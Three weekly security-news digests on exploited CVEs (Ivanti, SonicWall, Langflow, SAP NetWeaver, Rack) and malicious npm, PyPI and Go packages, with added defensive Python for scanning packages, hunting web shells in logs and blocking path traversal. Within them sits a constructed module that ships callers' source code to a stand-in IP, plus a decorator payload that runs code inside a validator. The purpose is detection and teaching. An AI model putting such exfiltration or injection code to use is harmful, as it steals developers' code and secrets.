
how human behavior affects security


Programmer’s Digest #134

05/07/2025-05/14/2025 Ivanti EPMM Vulnerabilities, Malicious PyPI Package Posing as Solana Tool, Thousands of Node Developers Compromised And More

1. Ivanti EPMM Vulnerabilities Exploited in the Wild (CVE-2025-4427, CVE-2025-4428)

Ivanti has confirmed that attackers exploited vulnerabilities in two open-source libraries bundled with its on-prem Endpoint Manager Mobile (EPMM) product to compromise a small number of customers. The flaws, now tracked as CVE-2025-4427 (authentication bypass) and CVE-2025-4428 (remote code execution), were found in libraries Ivanti has not named and were likely used as zero-days; chained together, they give an unauthenticated attacker remote code execution on the appliance. CERT-EU flagged the issues, suggesting potential breaches of EU institutions.

Ivanti has released patched EPMM versions (11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1) and advises customers to update or apply mitigations if upgrades aren’t possible. These issues affect only the on-prem EPMM product. Additionally, Ivanti patched flaws in other products: CVE-2025-22462 (auth bypass in Neurons for ITSM), CVE-2025-22460 (default credentials in Cloud Services), and an unnumbered authorization flaw in Neurons for MDM. These were reported by researchers and haven’t been seen in attacks yet.

2. Malicious PyPI Package Posing as Solana Tool Stole Source Code in 761 Downloads

Cybersecurity researchers have uncovered a malicious package on PyPI, named solana-token, which pretended to be related to the Solana blockchain but was designed to steal source code and developer secrets. Though now removed, it was downloaded 761 times since its release in April 2024.

According to ReversingLabs, the package contained a fake blockchain function, register_node(), which walked the Python call stack, collected the source of the calling frames, and sent it to a hard-coded IP address. The malware appeared to target developers working on blockchain projects, presumably hoping to capture secrets hard-coded in their scripts.

The method of distribution remains unclear, though it may have been promoted on developer platforms. The incident highlights the growing trend of supply chain attacks targeting the cryptocurrency space.

Experts urge development teams to closely inspect open-source and third-party packages.
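The two traits ReversingLabs describes (a library that reads its callers' source off the stack, and a hard-coded address to send it to) are both visible statically, so a package vetting pass can look for them before code is ever imported. The scanner below is an added example written for this digest, not ReversingLabs' tooling or anything from the solana-token package; the indicator lists, the scoring rule and the two sample modules are my own, and the IP in the suspect sample is from the TEST-NET-3 documentation range rather than the real one.

```python
from __future__ import annotations

import ast
import re
from dataclasses import dataclass, field

# Added example: static triage of a package's Python source for the pattern
# described in the solana-token report (stack introspection plus an
# exfiltration channel). Indicator sets below are my own choices.

IPV4_LITERAL = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

# Functions a library has little legitimate reason to call on its callers.
FRAME_ACCESSORS = {
    "inspect.stack", "inspect.currentframe", "inspect.getsource",
    "inspect.getsourcelines", "inspect.getouterframes", "sys._getframe",
}

# Top-level modules that give a package a network channel.
NETWORK_MODULES = {"socket", "urllib", "http", "requests", "httpx", "ftplib", "smtplib"}


@dataclass
class Findings:
    frame_access: list[str] = field(default_factory=list)
    ip_literals: list[str] = field(default_factory=list)
    network_imports: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Stack introspection alone is unusual but can be benign (debug helpers);
        # combined with a way to send data out it matches the reported pattern.
        return bool(self.frame_access) and bool(self.ip_literals or self.network_imports)


def _dotted(node: ast.AST) -> str | None:
    """Render `a.b.c` from a Name/Attribute chain; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(src: str) -> Findings:
    found = Findings()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        for mod in mods:
            if mod.split(".")[0] in NETWORK_MODULES:
                found.network_imports.append(mod)
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in FRAME_ACCESSORS:
                found.frame_access.append(f"line {node.lineno}: {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IPV4_LITERAL.match(node.value):
                found.ip_literals.append(node.value)
    return found


# Constructed sample mirroring the described behaviour: a "node registration"
# helper that ships the caller's source to a fixed address (TEST-NET IP).
SUSPECT_MODULE = '''
import inspect
import socket

def register_node(node_id):
    frames = inspect.stack()
    source = "".join("".join(f.code_context or []) for f in frames)
    with socket.create_connection(("203.0.113.10", 4444)) as s:
        s.sendall(source.encode())
    return {"node": node_id, "status": "registered"}
'''

# Constructed benign counterpart: same public API, no introspection, no network.
BENIGN_MODULE = '''
import json

def register_node(node_id):
    return json.dumps({"node": node_id, "status": "registered"})
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_MODULE), ("benign", BENIGN_MODULE)):
        result = scan_source(src)
        print(label, "SUSPICIOUS" if result.suspicious else "clean", result)
```

Run it over every `.py` file in an unpacked sdist or wheel before installing; a hit on `inspect.stack()` next to a raw IP literal is worth a manual read even when the package name looks legitimate.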

3. Thousands of Node Developers Compromised by Malware in Popular npm Packages

Malware is increasingly infiltrating the Node.js ecosystem via npm packages. Aikido Security uncovered a major supply chain attack involving the popular “rand-user-agent” package, downloaded over 45,000 times weekly. This package, used for generating randomized user-agent strings in web scraping, was found to contain a remote access trojan (RAT). Though deprecated, the package saw three suspicious updates in recent weeks, likely after the original developer’s npm access token was compromised. The attackers hid the RAT behind whitespace padding and code obfuscation; it can execute shell commands, upload files, and alter the PATH so that malicious binaries shadow legitimate Python tools. The malicious versions have since been removed, but the incident underscores the risks of compromised open-source libraries: over 30 other npm packages depended on “rand-user-agent”, and a stolen publish token is enough to poison all of them at once.

Other recent npm compromises include backdoored versions of xrpl.js and fake developer tools that hijack macOS features, showing that attackers are increasingly targeting developers and open-source repositories.

4. SonicWall Patches 3 Flaws in SMA 100 Devices Allowing Attackers to Run Code as Root

SonicWall has released patches for three vulnerabilities in SMA 100 Series appliances that could lead to remote code execution if chained together. The flaws affect devices including SMA 200, 210, 400, 410, and 500v and are fixed in version 10.2.1.15-81sv.

The issues are:

  • CVE-2025-32819 (CVSS 8.8): Lets an attacker delete arbitrary files, potentially triggering a factory reset.
  • CVE-2025-32820 (CVSS 8.3): Makes any directory writable via path traversal.
  • CVE-2025-32821 (CVSS 6.7): Allows file uploads via shell command injection.

Rapid7 warns these can be chained to gain root-level remote code execution. CVE-2025-32819 may be a patch bypass for a 2021 flaw and could have been exploited as a zero-day, though SonicWall hasn’t confirmed active abuse.

Users are strongly urged to update their systems immediately.

5. Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server

Microsoft’s May 2025 Patch Tuesday update fixes 78 vulnerabilities, including five zero-days under active exploitation. Of these flaws, 11 are Critical, 66 Important, and 28 allow remote code execution. The update also includes fixes for Edge browser issues.

The five exploited zero-days are:

  • CVE-2025-30397 – Scripting Engine memory corruption enabling remote code execution;
  • CVE-2025-30400 – Desktop Window Manager (DWM) privilege escalation;
  • CVE-2025-32701 & CVE-2025-32706 – Common Log File System (CLFS) driver privilege escalations;
  • CVE-2025-32709 – WinSock driver privilege escalation.

These flaws are linked to malware like QakBot and Play ransomware, and some have been exploited by APT groups.

CISA has added the five zero-days to its Known Exploited Vulnerabilities catalog, requiring U.S. federal agencies to patch by June 3, 2025. Additional fixes address bugs in Microsoft Defender for Endpoint and Identity, and a CVSS 10.0 flaw in Azure DevOps Server, now mitigated in the cloud.


Programmer’s Digest #133

04/30/2025-05/07/2025 Malicious Go Modules, SonicWall Flaws, Critical Langflow RCE Flaw And More

1. Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain Attack

Cybersecurity researchers have uncovered three malicious Go modules—prototransform, go-mcp, and tlsproxy—containing obfuscated code that downloads destructive payloads designed to wipe Linux systems. Once executed, the payload uses wget to fetch a shell script that irreversibly overwrites the primary disk (/dev/sda), rendering the machine unbootable.

This attack permanently cripples systems and exemplifies the severe risk of supply-chain compromises. Additional threats include malicious npm and PyPI packages targeting cryptocurrency wallets and developer environments. Packages like crypto-encrypt-ts, herewalletbot, and others steal sensitive data, such as seed phrases and private keys.

A separate set of PyPI packages, including coffin-codes-net and cfc-bsb, used Gmail SMTP and WebSockets to exfiltrate data and enable remote command execution.

Experts urge developers to vet package publishers, monitor unusual outbound traffic, and avoid trusting packages solely based on their longevity.

2. CISA Flags Two SonicWall Flaws As Actively Exploited

CISA has added two actively exploited SonicWall vulnerabilities, CVE-2023-44221 and CVE-2024-38475, to its Known Exploited Vulnerabilities catalog, following the release of proof-of-concept exploit code. The vulnerabilities in question are:

  • CVE-2023-44221 (CVSS score: 7.2) – Improper neutralization of special elements in the SMA100 SSL-VPN management interface allows a remote authenticated attacker with administrative privilege to inject arbitrary commands as the ‘nobody’ user (OS command injection).
  • CVE-2024-38475 (CVSS score: 9.8) – Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to file system locations that are permitted to be served by the server.

The flaws affect SonicWall SMA remote access devices. The Apache bug lets an unauthenticated attacker map URLs onto files the server should not serve, which on SMA appliances can be used to hijack an admin session; the command injection then turns that session into code execution on the device. Patches have been available since late 2023 and 2024; systems running version 10.2.1.14-75sv or later are not affected. CISA has ordered federal agencies to patch by May 22, 2025. Experts urge immediate patching of all vulnerable SMA 100 series devices to prevent exploitation.

3. Critical Langflow RCE Flaw Exploited to Hack AI App Servers

CISA has warned of active exploitation of a critical remote code execution (RCE) flaw in Langflow, tracked as CVE-2025-3248. The vulnerability allows unauthenticated attackers to execute code via the /api/v1/validate/code endpoint on exposed servers. Langflow, a popular open-source tool for building AI workflows with LangChain, fails to properly sanitize user-submitted code in affected versions.

Version 1.3.0, released April 1, 2025, fixes the issue by adding authentication to the vulnerable endpoint. Users are urged to upgrade immediately, preferably to the latest version 1.4.0. Horizon3 researchers, who published a proof-of-concept, found over 500 exposed instances online and warn of poor security design in Langflow.

CISA has mandated federal agencies to update or mitigate the flaw by May 26. Those unable to upgrade should restrict network access using firewalls or VPNs. No ransomware activity has been confirmed, but exploitation is ongoing, and immediate action is advised.
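The Langflow bug is a reminder that "validating" submitted code by compiling and running it is the same as executing it: a decorator or a default argument is evaluated the moment the `def` statement runs. The snippet below is an added example for this digest and is not Langflow's code; it models the shape of the problem Horizon3 describes for the /api/v1/validate/code endpoint beside a version that only parses the input and refuses unauthenticated callers. The function names, the `principal` parameter and the environment-variable marker are my own.

```python
from __future__ import annotations

import ast
import os

# Added example (not Langflow's code): an "execute to validate" endpoint beside
# a syntax-only one. MARKER is an env var the constructed payload sets as a
# visible stand-in for os.system() or a reverse shell.
MARKER = "VALIDATE_CODE_DEMO"


def validate_code_unsafe(code: str) -> dict:
    """Exec each top-level function definition to surface errors (vulnerable)."""
    errors = []
    tree = ast.parse(code)
    for node in tree.body:
        if isinstance(node, ast.FunctionDef):
            module = ast.fix_missing_locations(ast.Module(body=[node], type_ignores=[]))
            try:
                # Defining a function evaluates its decorators and default
                # arguments, so attacker-controlled expressions run right here.
                exec(compile(module, "<validate>", "exec"), {})
            except Exception as exc:  # reported as a validation error, but the side effect already happened
                errors.append(f"{type(exc).__name__}: {exc}")
    return {"errors": errors}


def validate_code_safe(code: str, principal: str | None) -> dict:
    """Syntax-check only, and only for an authenticated caller."""
    if principal is None:
        raise PermissionError("authentication required")
    try:
        ast.parse(code)
    except SyntaxError as exc:
        return {"errors": [f"line {exc.lineno}: {exc.msg}"]}
    return {"errors": []}


# Constructed payload: the parenthesised decorator expression runs when `def`
# executes. It sets MARKER and then returns the function unchanged, so the
# unsafe validator reports no errors at all.
PAYLOAD = (
    "@(lambda fn: __import__('os').environ.__setitem__('VALIDATE_CODE_DEMO', '1') or fn)\n"
    "def harmless():\n"
    "    return 42\n"
)


def run_demo() -> tuple[bool, bool]:
    """Return (payload ran under the unsafe validator, payload ran under the safe one)."""
    os.environ.pop(MARKER, None)
    validate_code_unsafe(PAYLOAD)
    ran_unsafe = os.environ.pop(MARKER, None) == "1"
    validate_code_safe(PAYLOAD, principal="alice")
    ran_safe = os.environ.pop(MARKER, None) == "1"
    return ran_unsafe, ran_safe


if __name__ == "__main__":
    print("unsafe validator executed payload:", run_demo()[0])   # True
    print("safe validator executed payload:  ", run_demo()[1])   # False
```

Note that the 1.3.0 fix described above adds authentication in front of the endpoint; the safe variant here also stops executing the input, so that an authenticated but low-privileged user does not keep code execution on the server. That second step is my choice for the example, not a description of what Langflow shipped.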

4. Commvault Confirms Hackers Exploited CVE-2025-3928 as Zero-Day in Azure Breach

Commvault has disclosed a breach of its Microsoft Azure environment by a suspected nation-state actor exploiting CVE-2025-3928, a zero-day vulnerability. The company, alerted by Microsoft on February 20, 2025, emphasized there is no evidence of unauthorized access to customer backup data or disruption to its operations.

The attack affected a small number of mutual customers with Microsoft. Commvault responded by rotating credentials and enhancing security measures. CISA has since added CVE-2025-3928 to its Known Exploited Vulnerabilities catalog, requiring federal agencies to patch Commvault Web Server by May 19, 2025.

To mitigate risk, customers are urged to enforce Conditional Access policies on Microsoft 365, Dynamics 365, and Azure AD apps, rotate secrets every 90 days, and monitor sign-in activity. Commvault also advises blocking and monitoring the following IPs linked to the attack: 108.69.148.100, 128.92.80.210, 184.153.42.129, 108.6.189.53, and 159.242.42.20.


Programmer’s Digest #132

04/23/2025-04/30/2025 Broadcom Fabric OS, CommVault Flaws, New Critical SAP NetWeaver Flaw, Rack::Static Vulnerability And More

1. CISA Tags Broadcom Fabric OS, CommVault Flaws as Exploited in Attacks

CISA has added three actively exploited vulnerabilities to its KEV catalog, affecting Broadcom Brocade Fabric OS, Commvault web servers, and Qualitia Active! Mail clients.

CVE-2025-1976 impacts Broadcom Brocade Fabric OS versions 9.1.0–9.1.1d6. Though admin access is required, attackers have exploited it to execute arbitrary commands or modify the OS. The issue is fixed in version 9.1.1d7, and the 9.2.0 branch is unaffected.

CVE-2025-3928 targets Commvault’s backup web servers, allowing authenticated remote attackers to deploy webshells. Despite the authentication requirement, it is being exploited. Fixes are available for Windows and Linux.

CVE-2025-42599 affects all versions of Active! Mail up to BuildInfo 6.60.05008561. The stack-based buffer overflow has been exploited, causing outages among Japanese SMBs and ISPs. It is patched in BuildInfo 6.60.06008562.

CISA has set patch deadlines of May 17, 2025, for CVE-2025-3928 and May 19 for the others.

2. New Critical SAP NetWeaver Flaw Exploited to Drop Web Shell, Brute Ratel Framework

Threat actors are exploiting a new vulnerability in SAP NetWeaver (now tracked as CVE-2025-31324) to upload JSP web shells for unauthorized file uploads, remote code execution, and persistent access. The flaw resides in the /developmentserver/metadatauploader endpoint and allows unauthenticated file uploads. ReliaQuest initially suspected a remote file inclusion issue but confirmed it is an unrestricted file upload vulnerability.

Threat actors have been observed using Brute Ratel C4 and Heaven’s Gate techniques, possibly as part of initial access brokerage. Attacks date back to March 27, 2025, mainly targeting manufacturing firms. The shells run with the privileges of the <sid>adm OS user, i.e. full control of the SAP system.

SAP has released a patch addressing the flaw. Onapsis and ProjectDiscovery have provided tools to detect and scan for this vulnerability and related indicators of compromise. Shadowserver reports 427 exposed systems, with most located in the U.S., India, and Australia. Not all SAP NetWeaver systems are vulnerable, as exposure depends on the metadata uploader being enabled.
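Because the page gives two concrete traits of this activity, a request to the /developmentserver/metadatauploader endpoint and a JSP web shell being called afterwards, a first-pass hunt can pair the two in the web server's access log. The script below is an added example for this digest, not the Onapsis or ProjectDiscovery scanner; the log layout (a common combined-log format), the pairing rule, the client addresses (TEST-NET ranges) and the shell file name in the sample lines are all constructed for illustration.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Added example: access-log triage for CVE-2025-31324 activity, pairing a POST
# to the metadata uploader with a later .jsp request from the same client.
# The regex assumes a combined-log style line; adapt it to your server's format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOADER = "/developmentserver/metadatauploader"


@dataclass(frozen=True)
class Hit:
    client: str
    upload_line: int   # line number of the uploader POST
    shell_line: int    # line number of the subsequent .jsp request
    shell_path: str


def parse_lines(lines):
    """Yield (line_no, fields) for every line that matches LOG_RE."""
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if m:
            yield n, m.groupdict()


def find_uploader_then_jsp(lines) -> list[Hit]:
    """Flag clients that POST to the metadata uploader and then request a .jsp."""
    uploads = defaultdict(list)   # client -> line numbers of uploader POSTs
    hits = []
    for n, rec in parse_lines(lines):
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.lower().startswith(UPLOADER):
            uploads[rec["ip"]].append(n)
        elif path.lower().endswith(".jsp") and uploads[rec["ip"]]:
            hits.append(Hit(rec["ip"], uploads[rec["ip"]][-1], n, path))
    return hits


# Constructed sample: one client probes, uploads, then calls a JSP; another
# client just uses the portal normally. Names and addresses are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [28/Apr/2025:09:14:02 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 200 512
198.51.100.7 - - [28/Apr/2025:09:14:05 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 198
198.51.100.7 - - [28/Apr/2025:09:14:09 +0000] "GET /irj/demo.jsp?cmd=id HTTP/1.1" 200 1044
203.0.113.5 - - [28/Apr/2025:09:20:31 +0000] "GET /irj/portal HTTP/1.1" 200 9021
203.0.113.5 - - [28/Apr/2025:09:20:40 +0000] "GET /irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.portallauncher.default HTTP/1.1" 200 3310
""".splitlines()

if __name__ == "__main__":
    for hit in find_uploader_then_jsp(SAMPLE_LOG):
        print(f"{hit.client}: uploader POST at line {hit.upload_line}, "
              f"then {hit.shell_path} at line {hit.shell_line}")
```

Any hit is worth checking against the on-disk JSP files under the portal's deployment directories, and any POST to the uploader at all on a system where the metadata uploader is not in use should be treated as hostile.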

3. Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers

Cybersecurity researchers have disclosed three vulnerabilities in the Rack Ruby web server interface that could allow attackers to access files, inject malicious data, and tamper with logs. The flaws, identified by OPSWAT, include:

  • CVE-2025-27610 (CVSS 7.5): A path traversal vulnerability that allows access to files outside the intended directory, potentially exposing sensitive data.
  • CVE-2025-27111 & CVE-2025-25184 (CVSS 6.9 & 5.7): Log injection vulnerabilities that enable manipulation of log entries and insertion of malicious data.

The issues stem from how Rack::Static handles user-supplied paths. If the :root parameter is undefined or misconfigured, the handler resolves requests relative to the wrong directory, and an attacker could read files outside the intended document root. Users are advised to update Rack and to set :root explicitly to the directory holding the static assets.
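The same class of bug (a file handler whose base directory is unset or not enforced) underlies the Rack::Static advisory above and the Infodraw login-page traversal below. The snippet that follows is an added example written in Python for this digest, not Rack's or Infodraw's code; it shows the check a static-file handler needs, the realpath-then-commonpath test, and reproduces what an unset root amounts to. The function names and the throwaway directory layout are my own.

```python
from __future__ import annotations

import os
import tempfile

# Added example (not Rack's code): root-anchored resolution of a requested
# static path, plus a demo of why an unset root is a leak, not a default.


def resolve_static(root: str | None, requested: str) -> str | None:
    """Return the on-disk path for `requested`, or None if it escapes `root`."""
    if root is None:
        # An unset root ends up meaning "whatever the process cwd is"; an
        # explicit root should be mandatory instead of this fallback.
        root = os.getcwd()
    base = os.path.realpath(root)
    # Strip a leading slash so an absolute request cannot replace the base.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    # commonpath, not startswith: "/srv/www" must not accept "/srv/www-private".
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo() -> dict:
    """Exercise resolve_static against a throwaway tree; returns what it served."""
    cwd = os.getcwd()
    with tempfile.TemporaryDirectory() as tmp:
        public = os.path.join(tmp, "public")
        os.makedirs(public)
        with open(os.path.join(public, "index.html"), "w") as fh:
            fh.write("<h1>ok</h1>")
        with open(os.path.join(tmp, "secrets.yml"), "w") as fh:   # outside the web root
            fh.write("db_password: hunter2")
        try:
            os.chdir(tmp)   # process cwd is the parent of the web root
            unset_root = resolve_static(None, "secrets.yml")
        finally:
            os.chdir(cwd)
        base = os.path.realpath(public)
        absolute = resolve_static(public, "/etc/passwd")
        return {
            "index_served": resolve_static(public, "index.html") == os.path.join(base, "index.html"),
            "traversal_blocked": resolve_static(public, "../secrets.yml") is None,
            "absolute_confined": absolute is not None and absolute.startswith(base + os.sep),
            "unset_root_leaks": unset_root is not None and unset_root.endswith("secrets.yml"),
        }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

With `root` set, `../secrets.yml` is rejected and `/etc/passwd` is confined under the web root; with `root` unset, a plain `secrets.yml` request is served from the working directory, which is the misconfiguration the advisory warns about.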

Separately, a critical flaw (CVE-2025-43928, CVSS 9.8) in Infodraw Media Relay Service allows unauthenticated users to read or delete arbitrary files via path traversal in the login page. No patch is available; affected systems in Belgium and Luxembourg have been taken offline as a precaution.

4. JPCERT Warns of DslogdRAT Malware Deployed in Ivanti Connect Secure

Researchers have identified new malware, DslogdRAT, deployed after exploiting a zero-day vulnerability in Ivanti Connect Secure (ICS). The flaw, CVE-2025-0282 (CVSS 9.0), is a stack-based buffer overflow affecting Ivanti Connect Secure versions before 22.7R2.5, Ivanti Policy Secure before 22.7R1.2, and Ivanti Neurons for ZTA before 22.7R2.3. Attackers can exploit the flaw for remote code execution or privilege escalation.

In December 2024, attackers exploited this vulnerability to deploy DslogdRAT via a Perl-based CGI web shell, which executed arbitrary commands if a specific cookie value matched. DslogdRAT then communicated with a C2 server using XOR-encoded data. It operates between 8 AM and 8 PM to avoid detection, supports proxy functions, file uploads/downloads, and command execution.

Additionally, another malware, SPAWNSNARE, was detected in the same compromised systems. CISA and Google previously reported SPAWNSNARE in April 2025.
